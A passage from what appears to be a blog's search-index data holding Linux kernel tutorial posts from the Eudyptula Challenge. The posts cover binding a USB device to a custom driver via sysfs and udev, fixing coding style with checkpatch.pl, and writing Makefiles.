$(MAKE) -C $(KDIR) M=$(PWD) modules clean: uninstall $(MAKE) -C $(KDIR) M=$(PWD) clean install: default sudo insmod HelloWorld.ko lsmod | grep HelloWorld uninstall: - lsmod | grep HelloWorld - sudo rmmod HelloWorld.ko reload: uninstall clean default install @echo -e \u0026#34;\\nDONE\u0026#34; Just by doing make install we can compile and load the module into the kernel. 
There are multiple ways to monitor changes in kernel, for this case, I\u0026rsquo;ll use journalctl, udevadm and lsusb commands to check the module messages, USB changes, and associated driver information for my device.\nTo begin with anything, we need to compile and install the module and check the messages from kernel.\nCompile and load:-\nmake install Check kernel logs:-\n### COMMAND:- udevadm monitor --kernel KERNEL[1736.016830] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1736.016864] add /bus/usb/drivers/ayedaemonUSBdriver (drivers) KERNEL[1736.016888] add /module/HelloWorld (module) ### COMMAND:- journalctl --grep=usb -f Jun 29 11:11:41 FatSaturn kernel: usbcore: registered new interface driver ayedaemonUSBdriver Jun 29 11:11:41 FatSaturn kernel: USB driver registered this time ### COMMAND:- lsmod | grep HelloWorld HelloWorld 20480 0 The above logs helps us to identify that our module was loaded to the kernel successfully. Now time to insert the USB stick (pen-drive).\n### COMMAND:- udevadm monitor --kernel KERNEL[1981.372348] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3 (usb) KERNEL[1981.377254] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1981.378079] add /devices/virtual/workqueue/scsi_tmf_3 (workqueue) KERNEL[1981.379821] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3 (scsi) KERNEL[1981.379930] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/scsi_host/host3 (scsi_host) KERNEL[1981.380070] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0 (usb) KERNEL[1981.380229] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3 (usb) KERNEL[1982.383440] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0 (scsi) KERNEL[1982.383621] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0 (scsi) KERNEL[1982.383811] add 
/devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/scsi_device/3:0:0:0 (scsi_device) KERNEL[1982.384405] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/scsi_disk/3:0:0:0 (scsi_disk) KERNEL[1982.385312] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/bsg/3:0:0:0 (bsg) KERNEL[1982.389641] add /devices/virtual/bdi/8:32 (bdi) KERNEL[1982.408429] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc (block) KERNEL[1982.408491] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc/sdc1 (block) KERNEL[1982.408532] add /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0/block/sdc/sdc2 (block) KERNEL[1982.410675] bind /devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3/1-4.3:1.0/host3/target3:0:0/3:0:0:0 (scsi) ### COMMAND:- journalctl --grep=usb -f Jun 29 11:15:46 FatSaturn kernel: usb 1-4.3: new high-speed USB device number 12 using xhci_hcd Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: New USB device found, idVendor=058f, idProduct=6387, bcdDevice= 1.00 Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3 Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: Product: Mass Storage Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: Manufacturer: Generic Jun 29 11:15:47 FatSaturn kernel: usb 1-4.3: SerialNumber: EFEC1147 Jun 29 11:15:47 FatSaturn kernel: usb-storage 1-4.3:1.0: USB Mass Storage device detected Jun 29 11:15:47 FatSaturn kernel: scsi host3: usb-storage 1-4.3:1.0 Jun 29 11:15:47 FatSaturn mtp-probe[8926]: checking bus 1, device 12: \u0026#34;/sys/devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3\u0026#34; Jun 29 11:15:47 FatSaturn mtp-probe[8939]: checking bus 1, device 12: \u0026#34;/sys/devices/pci0000:00/0000:00:14.0/usb1/1-4/1-4.3\u0026#34; ### COMMAND:- lsusb Port 3: Dev 13, If 0, Class=Mass Storage, 
Driver=usb-storage, 480M The above output clearly shows that the pen-drive was detected but it was assigned to another driver instead of my custom driver. So we need to unbind the device from the currently associated driver and then bind it to our driver. It is actually very easy to do in newer kernels (anything\u0026gt;=2.6.13-rc3). There are many resources for this topic on the Internet, but I found this one short and precise article on lwn.net. TL;DR: I just had to invoke 2 commands from a terminal.\nsudo /bin/bash -c \u0026#39;echo 1-4.3:1.0 \u0026gt; /sys/bus/usb/drivers/usb-storage/unbind\u0026#39; sudo /bin/bash -c \u0026#39;echo 1-4.3:1.0 \u0026gt; /sys/bus/usb/drivers/ayedaemonUSBdriver/bind\u0026#39; These are the files exposed by the kernel to handle dynamic binding and unbinding from user-space. The string 1-4.3:1.0 is a location specifier: it identifies the USB interface (drivers bind to interfaces, not to endpoints) that needs this driver.\nIf we break it down it\u0026rsquo;ll be much more understandable.\n## 1-4.3:1.0 1: root_hub 4: My USB hub (usb hub extension connected to laptop usb port) 3: USB device connected to that hub 1: Config number 0: Interface number To summarize, the device naming scheme is somewhat like this -\u0026gt; root_hub-hub_port.internal_port:config.interface. So if I plug my pen-drive directly into my laptop USB port, it should give me something like 1-*:1.0, because I know I\u0026rsquo;m plugging it into bus 1 (It\u0026rsquo;s my laptop, I know it), and the config.interface part will be the same as before. The interesting thing to note here is that since there is no external hub connected this time, hub_port.internal_port will just be hub_port. So I\u0026rsquo;m expecting only 1 value in that place. Hence, 1-*:1.0 and in the logs, I got 1-2:1.0.\nIn this era of laziness and automation, we will want to do some automation for binding/unbinding. 
What we need is a program that keeps listening for device events and runs our commands when a particular event occurs\u0026hellip; udev can help us do that! All we have to do is write a simple rule and provide it to udev and the rest will be taken care of.\nTo create a udev rule, paste the below text in the following file - /etc/udev/rules.d/99-custom-usb.rules\nACTION==\u0026#34;bind\u0026#34;, SUBSYSTEMS==\u0026#34;usb\u0026#34;, \\ OPTIONS=\u0026#34;log_level=debug\u0026#34;, \\ ATTRS{idVendor}==\u0026#34;058f\u0026#34;, ATTRS{idProduct}==\u0026#34;6387\u0026#34;, \\ RUN+=\u0026#34;/bin/bash -c \u0026#39;echo $kernel \u0026gt; /sys/bus/usb/drivers/usb-storage/unbind\u0026#39;\u0026#34;, \\ RUN+=\u0026#34;/bin/bash -c \u0026#39;echo $kernel \u0026gt; /sys/bus/usb/drivers/ayedaemonUSBdriver/bind\u0026#39;\u0026#34; The above rule matches the USB attributes and triggers the RUN commands accordingly. If you want this rule to be more generic, remove the ATTRS{idVendor} and ATTRS{idProduct}. Read here to learn more about writing udev rules.\nIf you change the C code, reload the module and remove the ATTRS selectors from the udev rule, you get a system where any usb-storage kind of device will be automatically bound with Driver=ayedaemonUSBdriver.\nPort 3: Dev 18, If 0, Class=Mass Storage, Driver=ayedaemonUSBdriver, 480M ID 058f:6387 Alcor Micro Corp. Flash Drive Port 1: Dev 17, If 0, Class=Mass Storage, Driver=ayedaemonUSBdriver, 480M ID 0930:6545 Toshiba Corp. Kingston DataTraveler 102/2.0 / HEMA Flash Drive 2 GB / PNY Attache 4GB Stick Conclusion Writing a Linux USB device driver is not a difficult task if one understands how the USB subsystem works behind the abstractions. This article just touches the surface of USB drivers and there is still a lot more to look out for\u0026hellip; like USB urbs. If you want to continue learning more about USB drivers, the most common recommendation on the internet is - Linux Device Drivers: Chapter 13. 
USB Drivers. This book is somewhat dated, but the content is still relevant.\nhttps://en.wikipedia.org/wiki/USB\nhttps://www.usb.org/\nhttp://www.linux-usb.org/USB-guide/book1.html\nhttp://www.linux-usb.org/usb.ids\nhttps://www.usb.org/defined-class-codes\nhttps://www.kernel.org/doc/html/latest/driver-api/usb/index.html\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L67\nhttps://elixir.bootlin.com/linux/latest/source/include/uapi/linux/usb/ch9.h#L407\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L232\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L82\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L374\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/usb.h#L626\nhttps://elixir.bootlin.com/linux/latest/source/include/linux/mod_devicetable.h#L127\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-5/","summary":"This is Task 05 of the Eudyptula Challenge ------------------------------------------ Yeah, you survived the coding style mess! Now, on to some \u0026#34;real\u0026#34; things, as I know you are getting bored by these so far. 
So, simple task this time around: - take the kernel module you wrote for task 01, and modify it so that when a USB keyboard is plugged in, the module will be automatically loaded by the correct userspace hotplug tools (which are implemented by depmod / kmod / udev / mdev / systemd, depending on what distro you are using.","title":"Eudyptula Task5"},{"content":"This is Task 04 of the Eudyptula Challenge ------------------------------------------ Wonderful job in making it this far, I hope you have been having fun. Oh, you\u0026#39;re getting bored, just booting and installing kernels? Well, time for some pedantic things to make you feel that those kernel builds are actually fun! Part of the job of being a kernel developer is recognizing the proper Linux kernel coding style. The full description of this coding style can be found in the kernel itself, in the Documentation/CodingStyle file. I\u0026#39;d recommend going and reading that right now, it\u0026#39;s pretty simple stuff, and something that you are going to need to know and understand. There is also a tool in the kernel source tree in the scripts/ directory called checkpatch.pl that can be used to test for adhering to the coding style rules, as kernel programmers are lazy and prefer to let scripts do their work for them... And why a coding standard at all? That\u0026#39;s because of your brain (yes, yours, not mine, remember, I\u0026#39;m just some dumb shell scripts). Once your brain learns the patterns, the information contained really starts to sink in better. So it\u0026#39;s important that everyone follow the same standard so that the patterns become consistent. In other words, you want to make it really easy for other people to find the bugs in your code, and not be confused and distracted by the fact that you happen to prefer 5 spaces instead of tabs for indentation. 
Of course you would never prefer such a thing, I\u0026#39;d never accuse you of that, it was just an example, please forgive my impertinence! Anyway, the tasks for this round all deal with the Linux kernel coding style. Attached to this message are two kernel modules that do not follow the proper Linux kernel coding style rules. Please fix both of them up, and send it back to me in such a way that does follow the rules. What, you recognize one of these modules? Imagine that, perhaps I was right to accuse you of the using a \u0026#34;wrong\u0026#34; coding style :) Yes, the logic in the second module is crazy, and probably wrong, but don\u0026#39;t focus on that, just look at the patterns here, and fix up the coding style, do not remove lines of code. Coding styles \u0026ndash; what and why? We all have different styles and preferences in everything in life. Even while writing code, everyone loves to imprint their personality on the code, which brings originality and a sense of ownership and responsibility.\nCoding styles are sets of rules or suggestions for writing code. The idea behind developing these sets of rules is very simple - to make code readable by everybody, or just to get your brain used to a specific style so that you can easily understand code written by another person.\nThe code style depends mainly on the language; a few decisions depend on the context and may change when you switch from one project to another. Some of these decisions might be:\nComments (how and when you use them) Tabs or spaces for indentation (the number of spaces is quite important) Appropriate naming of variables and functions. Code grouping and organization. Patterns to be used or avoided. 
But what happens when a whole team is working on one project?\nEveryone develops a certain style and for individual work, this is great\u0026hellip; but when you need more people on your team, understanding different styles could become a problem for everyone.\nThis has been on my mind a lot lately. For instance, during a code review, I often question whether I should bring specific ways of coding into the discussion or not. How does it affect the application? Is it readable, is it easy to maintain?\nOr perhaps I should leave it alone, thinking to myself: don’t be picky, it’s just their preference, it’s not a matter of right or wrong.\nLinux kernel developers have done an amazing job of building a coding style that is followed by almost everybody who gets involved in the kernel development process.\nHow bad can it go? If we do not have a properly defined coding style, we might end up with mostly working but very unreadable code\u0026hellip; This can be very unhealthy for a mere human being.\nLet\u0026rsquo;s take a simple example (in the C programming language) to understand the need for coding styles.\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;This is a very long line with some garbage text. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Pulvinar neque laoreet suspendisse interdum consectetur libero. Turpis nunc eget lorem dolor sed viverra ipsum nunc. Semper feugiat nibh sed pulvinar proin gravida hendrerit lectus. Turpis egestas sed tempus urna et. Ornare lectus sit amet est placerat. Quam elementum pulvinar etiam non quam. Consequat semper viverra nam libero. Nisl condimentum id venenatis a condimentum vitae. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra.\u0026#34;); return 0; } The above code is very simple in terms of functionality - it prints a huge paragraph. 
The same code can also be written in the below style\u0026hellip;\n#include \u0026lt;stdio.h\u0026gt; int main () { printf ( \u0026#34;This is a very long line with some garbage text. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Pulvinar neque laoreet suspendisse interdum consectetur libero. Turpis nunc eget lorem dolor sed viverra ipsum nunc. Semper feugiat nibh sed pulvinar proin gravida hendrerit lectus. Turpis egestas sed tempus urna et. Ornare lectus sit amet est placerat. Quam elementum pulvinar etiam non quam. Consequat semper viverra nam libero. Nisl condimentum id venenatis a condimentum vitae. Vitae proin sagittis nisl rhoncus mattis rhoncus urna neque viverra.\u0026#34; ) ;return 0; } I know nobody will ever write code in this style..but it is still a possible option to write a working code.\nOr you might be familiar with the below code\u0026hellip;. Spoiler:- This prints a rotating donut. Read this amazing article to understand the maths behind it.\nk;double sin() ,cos();main(){float A= 0,B=0,i,j,z[1760];char b[ 1760];printf(\u0026#34;\\x1b[2J\u0026#34;);for(;; ){memset(b,32,1760);memset(z,0,7040) ;for(j=0;6.28\u0026gt;j;j+=0.07)for(i=0;6.28 \u0026gt;i;i+=0.02){float c=sin(i),d=cos(j),e= sin(A),f=sin(j),g=cos(A),h=d+2,D=1/(c* h*e+f*g+5),l=cos (i),m=cos(B),n=s\\ in(B),t=c*h*g-f* e;int x=40+30*D* (l*h*m-t*n),y= 12+15*D*(l*h*n +t*m),o=x+80*y, N=8*((f*e-c*d*g )*m-c*d*e-f*g-l *d*n);if(22\u0026gt;y\u0026amp;\u0026amp; y\u0026gt;0\u0026amp;\u0026amp;x\u0026gt;0\u0026amp;\u0026amp;80\u0026gt;x\u0026amp;\u0026amp;D\u0026gt;z[o]){z[o]=D;;;b[o]= \u0026#34;.,-~:;=!*#$@\u0026#34;[N\u0026gt;0?N:0];}}/*#****!!-*/ printf(\u0026#34;\\x1b[H\u0026#34;);for(k=0;1761\u0026gt;k;k++) putchar(k%80?b[k]:10);A+=0.04;B+= 0.02;}}/*****####*******!!=;:~ ~::==!!!**********!!!==::- .,~~;;;========;;;:~-. 
..,--------,*/ Anyways, my point is that the code can become very unreadable and unmaintainable if no coding style guidelines are defined. Early in my journey, I engaged in all kinds of holy wars on code styles. I would read some article about why a particular convention was correct, while another was totally wrong. But I\u0026rsquo;ve finally come to a conclusion - these things don\u0026rsquo;t matter; consistency and readability matter.\nThe development process of the Linux kernel is very chaotic, with thousands of developers working completely remotely on the same code base. How do they do it without messing it all up?\nOut of many reasons, one is that all kernel developers try their best to follow the code style guidelines laid out in the official kernel documentation 1. There they provide all the necessary details and examples to make their point. And still, it is just a recommendation, not forcing anybody to be very specific about it.\nFixing the style issues In this task, we are provided with 2 different modules (Linux Kernel Modules)\u0026hellip; and our job here is to fix their style as per the kernel coding style.\nYou don\u0026rsquo;t have to read the complete coding style to fix it; smart people have already built a tool that can check these issues and report them to us in a clean way. Linux provides the scripts/checkpatch.pl 2 script for this. This script can check the code for trivial style violations in patches and optionally correct them. This tool can also be used for regular kernel source code files. Read more about this tool in the official docs 3.\nThis is not a very unique idea; today we have linters and other tools that can check the style issues and report them or fix them automatically in your source code\u0026hellip; in almost all programming languages. You can add one such tool to your pre-commit hook, or use one of the plugins most IDEs have for this.\nAnyways, let\u0026rsquo;s pick up a file and run the checkpatch tool against it. 
The code looked fine to me at first\u0026hellip; it had a good filename at top and has got indentations.\n/* * helloworld.c */ #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; static int hello_init(void) { pr_debug(\u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_exit(void) { pr_debug(\u0026#34;See you later.\\n\u0026#34;); } module_init(hello_init); module_exit(hello_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Just a module\u0026#34;); But it still does not follow the guidelines. You can check that using the tool - checkpatch.pl.\n## COMMAND - ../linux/scripts/checkpatch.pl -f helloworld.c WARNING: Missing or malformed SPDX-License-Identifier tag in line 1 #1: FILE: helloworld.c:1: +/* WARNING: It\u0026#39;s generally not useful to have the filename in the file #2: FILE: helloworld.c:2: +* helloworld.c WARNING: Block comments should align the * on each line #2: FILE: helloworld.c:2: +/* +* helloworld.c total: 0 errors, 3 warnings, 24 lines checked There are 3 warnings reported by this script\u0026hellip;\nAdd SPDX licence info in line 1 Filename at top is not useful Block comments should have * aligned (This will be discarded because according to point 2, we are going to remove that comment block) Now after fixing the code according to the provided suggestions, we get the below code:\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; static int hello_init(void) { pr_debug(\u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_exit(void) { pr_debug(\u0026#34;See you later.\\n\u0026#34;); } module_init(hello_init); module_exit(hello_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Just a 
module\u0026#34;); In the other module file, we have code that looks good at first, but the checkpatch results indicate otherwise.\nCode:-\n#include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/delay.h\u0026gt; #include \u0026lt;linux/slab.h\u0026gt; int do_work(int *my_int, int retval) { int x; int y = *my_int; int z; for (x = 0; x \u0026lt; *my_int; ++x) udelay(10); if (y \u0026lt; 10) /* * That was a long sleep, tell userspace about it */ pr_debug(\u0026#34;We slept a long time!\u0026#34;); z = x * y; return z; } int my_init(void) { int x = 10; x = do_work(\u0026amp;x, x); return x; } void my_exit(void) { return; } module_init(my_init); module_exit(my_exit); This module is somewhat different from what we previously saw. Apart from the regular init and exit functions, this module has an extra function that is called by the init function. That\u0026rsquo;s it. You don\u0026rsquo;t have to worry about the code and other logic at this point.. just focus on coding style.\n# COMMAND - ../linux/scripts/checkpatch.pl -f coding_style.c WARNING: Missing or malformed SPDX-License-Identifier tag in line 1 #1: FILE: coding_style.c:1: +#include \u0026lt;linux/module.h\u0026gt; WARNING: void function return statements are not generally useful #35: FILE: coding_style.c:35: +\treturn; +} total: 0 errors, 2 warnings, 38 lines checked The script gives us 2 warnings for this module.\nSPDX licence (just as the previous one, we\u0026rsquo;ll talk more about it later.) void function return statements. (Void functions do not return anything; no return statements are required) For this case, I added the SPDX licence comment at line 1 and commented out the return statement. If you want, you can remove it entirely from the code. 
For me, the new code looks like below:-\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/delay.h\u0026gt; #include \u0026lt;linux/slab.h\u0026gt; int do_work(int *my_int, int retval) { int x; int y = *my_int; int z; for (x = 0; x \u0026lt; *my_int; ++x) udelay(10); if (y \u0026lt; 10) /* * That was a long sleep, tell userspace about it */ pr_debug(\u0026#34;We slept a long time!\u0026#34;); z = x * y; return z; } int my_init(void) { int x = 10; x = do_work(\u0026amp;x, x); return x; } void my_exit(void) { // return; } module_init(my_init); module_exit(my_exit); Great!! You are now familiar with the coding style issues in the Linux kernel code and have the ability to fix such issues. If you want to automate this further, you can also use pre-commit hooks. Read more about git hooks from githooks.com 4\nhttps://www.kernel.org/doc/html/v4.10/process/coding-style.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://elixir.bootlin.com/linux/latest/source/scripts/checkpatch.pl\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/dev-tools/checkpatch.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://githooks.com/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-4/","summary":"This is Task 04 of the Eudyptula Challenge ------------------------------------------ Wonderful job in making it this far, I hope you have been having fun. Oh, you\u0026#39;re getting bored, just booting and installing kernels? Well, time for some pedantic things to make you feel that those kernel builds are actually fun! Part of the job of being a kernel developer is recognizing the proper Linux kernel coding style. 
The full description of this coding style can be found in the kernel itself, in the Documentation/CodingStyle file.","title":"Eudyptula Task4"},{"content":"This is Task 03 of the Eudyptula Challenge ------------------------------------------ Now that you have your custom kernel up and running, it\u0026#39;s time to modify it! The tasks for this round is: - take the kernel git tree from Task 02 and modify the Makefile to and modify the EXTRAVERSION field. Do this in a way that the running kernel (after modifying the Makefile, rebuilding, and rebooting) has the characters \u0026#34;-eudyptula\u0026#34; in the version string. - show proof of booting this kernel. Extra cookies for you by providing creative examples, especially if done in intrepretive dance at your local pub. - Send a patch that shows the Makefile modified. Do this in a manner that would be acceptable for merging in the kernel source tree. (Hint, read the file Documentation/SubmittingPatches and follow the steps there.) Linux kernel source code is very huge and compiling such source code files can be tiring, especially when you have to include several source files from different directories and type the compiling command every time you need to compile. Makefiles are the solution to automate and simplify this task.\nWhat is a Makefile?? Makefile is a specially formated file which contains all the steps to compile your program in the form of rules. These rules are also sometimes referred as recipes (\u0026hellip;but they both are totally different things🤷‍♂️) and these rules are executed by a utility called make. You might have used make to compile a program from source code. Most open source projects use it to compile a final executable binary, which can then be installed typically using make install.\nUnderstand with examples Let\u0026rsquo;s start with very simple and classic example - \u0026ldquo;Hello World\u0026rdquo;. 
To begin with, create a new directory called my_make_dir containing a Makefile with the below contents in it.\n# Comment - this says hello say_hello: echo \u0026#34;Hello World\u0026#34; If you run make say_hello inside the directory, it\u0026rsquo;ll give the below output:\necho \u0026#34;Hello World\u0026#34; Hello World We just created our first Makefile rule and triggered it to run. Here say_hello behaves like a function name; it is called the target, and echo \u0026quot;Hello World\u0026quot; is its recipe. In a single Makefile there can be multiple targets, each with its own set of recipes.\nLet\u0026rsquo;s take a look at another example now,\n# Comment - this says hello say_hello: echo \u0026#34;Hello World\u0026#34; say_bye: say_hello echo \u0026#34;I\u0026#39;m going now!\u0026#34; echo \u0026#34;Bye Bye world\u0026#34; In the above example, we have 2 targets, namely, say_hello and say_bye. For the target say_bye, we have set say_hello as a dependency or prerequisite. Pre-requisites are other targets in the Makefile which should run before the intended target. So when we invoke the say_bye target, it\u0026rsquo;ll first trigger the prerequisite say_hello and then say_bye will be triggered.\n# COMMAND - make say_bye echo \u0026#34;Hello World\u0026#34; Hello World echo \u0026#34;I\u0026#39;m going now!\u0026#34; I\u0026#39;m going now! echo \u0026#34;Bye Bye world\u0026#34; Bye Bye world Another key point about the make utility is that whenever it is invoked without a target, it\u0026rsquo;ll trigger the topmost target present in the Makefile. In this case, it\u0026rsquo;ll trigger say_hello as it is the first target in the Makefile.\n# COMMAND - make echo \u0026#34;Hello World\u0026#34; Hello World More practical examples Now we know some basic terminology around Makefiles and how they work. 
Let\u0026rsquo;s take a look at a more practical example that can be related to a real-world task.\nall: say_hello generate say_hello: @echo \u0026#34;Hello World\u0026#34; generate: @echo \u0026#34;Creating empty text files...\u0026#34; touch file-{1..10}.txt clean: @echo \u0026#34;Cleaning up...\u0026#34; rm *.txt say_bye: clean @echo \u0026#34;Bye World\u0026#34; In the above example, we have many targets, some with pre-requisites and some without. Let\u0026rsquo;s pick each one of them and go one by one:\nall : This is the first target in the file, so if we do not pass any target to the make utility, it\u0026rsquo;ll trigger this target by default. It has no recipes - just a simple rule without recipes. But this rule has some pre-requisites that will run before anything else, in the given order (first say_hello, then generate). say_hello : This is another target that can be triggered as a single rule or as a pre-requisite for the all target. Either way, it\u0026rsquo;ll simply print the following string - Hello World. generate : This target is responsible for generating 10 empty files numbered from 1 to 10. Just like say_hello, it can also be triggered as a single standalone target or as a pre-requisite for the all target. clean : This target removes all the .txt files from the folder. The idea is to delete all the files created by the generate target. say_bye : This target prints \u0026ldquo;Bye World\u0026rdquo;, but has the clean target as a pre-requisite, so it\u0026rsquo;ll first clean and then run its own recipes. Note:- any line after a # (hash) character will be treated as a comment by the make utility\nNow that we understand what the Makefile consists of, let\u0026rsquo;s see how we are going to use it for our case.\nTo get a \u0026ldquo;Hello World\u0026rdquo; message and create all the files we can simply type make. This will trigger the first target all, that in turn will execute say_hello and generate. 
Once you are done with everything and want to clean up the mess, you can just type make say_bye. This target will first clean and then provide you with a goodbye message. That\u0026rsquo;s it. Pretty easy, isn\u0026rsquo;t it? Now let\u0026rsquo;s bang our heads against another example that is closer to a real-world application.\nFor this, we need to write our program (I\u0026rsquo;ll use the C language for that; language is never a barrier for the make command). Open up a text editor and write your first HelloWorld.c program.\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;Hello World\\n\u0026#34;); return 0; } The above program will simply print \u0026ldquo;Hello World\u0026rdquo; when compiled and executed. We can write make recipes for this now.\n# Compile the source code HelloWorld.o: HelloWorld.c gcc HelloWorld.c -o HelloWorld.o # Execute the binary HelloWorld: HelloWorld.o ./HelloWorld.o The above Makefile has 2 rules with HelloWorld.o and HelloWorld as targets. Both targets have a recipe and a pre-requisite. Remember, the pre-requisite executes first and then the actual recipe for the target\u0026hellip; That\u0026rsquo;s how these rules work.\nSo if I trigger the HelloWorld target, then it\u0026rsquo;ll trigger the HelloWorld.o target as a pre-requisite, which will compile the HelloWorld.c source code; once the HelloWorld.o target is completed, it\u0026rsquo;ll execute the generated ./HelloWorld.o binary\u0026hellip; This can now be further reduced to invoking a single make command, by making sure that the HelloWorld target runs first by default.\nYou\u0026rsquo;ll have to change the Makefile to get the desired behaviour,\n# Creates a variable (this points to the compiler) CC=gcc # First target in the file, default. 
all: HelloWorld # Executes the source code HelloWorld: HelloWorld.o ./HelloWorld.o # Compile the source code HelloWorld.o: HelloWorld.c ${CC} HelloWorld.c -o HelloWorld.o Above Makefile is now good to compile and run our source code. It has got a variable that stores the compiler name, and it is used in HelloWorld.o target with ${CC} syntax. I believe you understand the rest.\nNow you can invoke make and it\u0026rsquo;ll compile the source and execute the binary in a single go. One key thing to observe here is, that when we run make multiple times without changing the source code, it is not recompiling the code. This saves us a lot of time. And this is exactly why make is so de-facto automation tool for such usecases. (not \u0026ldquo;de-facto\u0026rdquo;, but you get it, right?)\nNow, what about cleaning?? We gotta clean our mess. Although we don\u0026rsquo;t have huge mess, but mess is mess and one gotta take care of his own mess. So we are going to write another rule in our Makefile.\n# Deletes the executable binary file clean: rm -rf HelloWorld.o Now, anybody who will be using this, just needs to remember 2 commands:-\nmake : to actually compile and run the binary file. make clean : To remove the compiled binary file. Makefile for kernel Linux Kernel also uses makefiles (Plural; not singular) to make the building process relatively very easy for anybody. They just have to type 2 commands and a fresh new custom kernel will be ready for them. Although, this might take a lot of time depending upon what hardware you are running on and what files are you gonna compile.\nTake a look at the top few lines of the Makefile in the top most directory of source tree.\n# SPDX-License-Identifier: GPL-2.0 VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 EXTRAVERSION = -ExtraVersionText NAME = Superb Owl This tells about a lot of things related to version and name given to that version. 
We can see our EXTRAVERSION which I\u0026rsquo;ve changed in the file (for Task 3 - Eudyptula Challenge).\nReading further down, we have many sections, separated by comment blocks. These comment blocks are simple and grep-able, give them a try. Once we are comfortable with the idea of Makefiles and the Linux kernel, we can connect all the dots and understand how things are linked together.\nWe started with a .config file that contains all the required kernel configurations. This file is then read by the top-level Makefile in the Linux kernel directory. This Makefile is responsible for building 2 major products: vmlinux \u0026amp; modules. To achieve this, make goes recursively into the sub-directories of the kernel source tree and builds and compiles everything. The list of directories is determined using the .config file\u0026hellip;. because that\u0026rsquo;s what we want to compile. According to the official kernel docs, people have four different relationships with the kernel Makefiles.\nSome will simply build kernel using commands like make menuconfig and make Some will work with device drivers or other kernel features and will have to deal with kbuild makefiles for each subsystem they are working on. A few will be working with architecture specific code and will be responsible for arch makefiles. And then, there are kbuild developers\u0026hellip;. people who work on the kernel build system itself. There are many things that kernel developers need to understand when they are working on kernel features. One of those many things is the kernel build makefiles. If you want, read more about the important segments of a kernel makefile in the official documentation here.1\nNow we know what a makefile is, how it works and a little bit about kernel makefiles. Now the last part of the task - to make a patch of the modified Makefile. This is very easy with git\u0026hellip; you know git right?\nJust do git diff Makefile in the Linux kernel source directory. 
